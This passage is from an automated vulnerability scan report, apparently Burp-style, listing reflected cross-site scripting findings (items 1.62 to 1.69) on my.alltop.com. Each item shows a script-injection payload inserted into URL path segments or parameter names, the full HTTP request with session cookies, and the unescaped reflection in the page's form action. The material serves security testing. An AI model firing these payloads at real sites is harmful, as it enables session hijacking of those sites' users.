1.62. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb328"><script>alert(1)</script>6edab67d23c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3Ceb328"><script>alert(1)</script>6edab67d23c/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3Ceb328"><script>alert(1)</script>6edab67d23c/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.63. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacc1"><script>alert(1)</script>7c61bfbb01f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3Caacc1"><script>alert(1)</script>7c61bfbb01f/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:35 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3Caacc1"><script>alert(1)</script>7c61bfbb01f/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.64. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83c1"><script>alert(1)</script>398cd5a4c2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3Ea83c1"><script>alert(1)</script>398cd5a4c2a HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:39 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:39 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:39 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3Ea83c1"><script>alert(1)</script>398cd5a4c2a" method="post" accept-charset="utf-8">
...[SNIP]...

1.65. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51512"><script>alert(1)</script>db3a9d45e2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E?51512"><script>alert(1)</script>db3a9d45e2d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:24 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:25 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:25 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E?51512"><script>alert(1)</script>db3a9d45e2d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.66. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%22ns=%22netsparker(0x00017F)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f100"><script>alert(1)</script>a1806507e17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c7f100"><script>alert(1)</script>a1806507e17/%22ns=%22netsparker(0x00017F) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c7f100"><script>alert(1)</script>a1806507e17/%22ns=%22netsparker(0x00017F)" method="post" accept-charset="utf-8">
...[SNIP]...

1.67. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%22ns=%22netsparker(0x00017F)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 768ae"><script>alert(1)</script>785a501ff5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%22ns768ae"><script>alert(1)</script>785a501ff5d=%22netsparker(0x00017F) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:24 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:24 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:24 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%22ns768ae"><script>alert(1)</script>785a501ff5d=%22netsparker(0x00017F)" method="post" accept-charset="utf-8">
...[SNIP]...

1.68. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%22ns=%22netsparker(0x00017F)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7fe2"><script>alert(1)</script>ebeac01edfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%22ns=%22netsparker(0x00017F)?a7fe2"><script>alert(1)</script>ebeac01edfd=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:21 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%22ns=%22netsparker(0x00017F)?a7fe2"><script>alert(1)</script>ebeac01edfd=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.69. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5dd9"><script>alert(1)</script>f2db9325532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ce5dd9"><script>alert(1)</script>f2db9325532/%2522ns%253D%2522netsparker%25280x000184%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

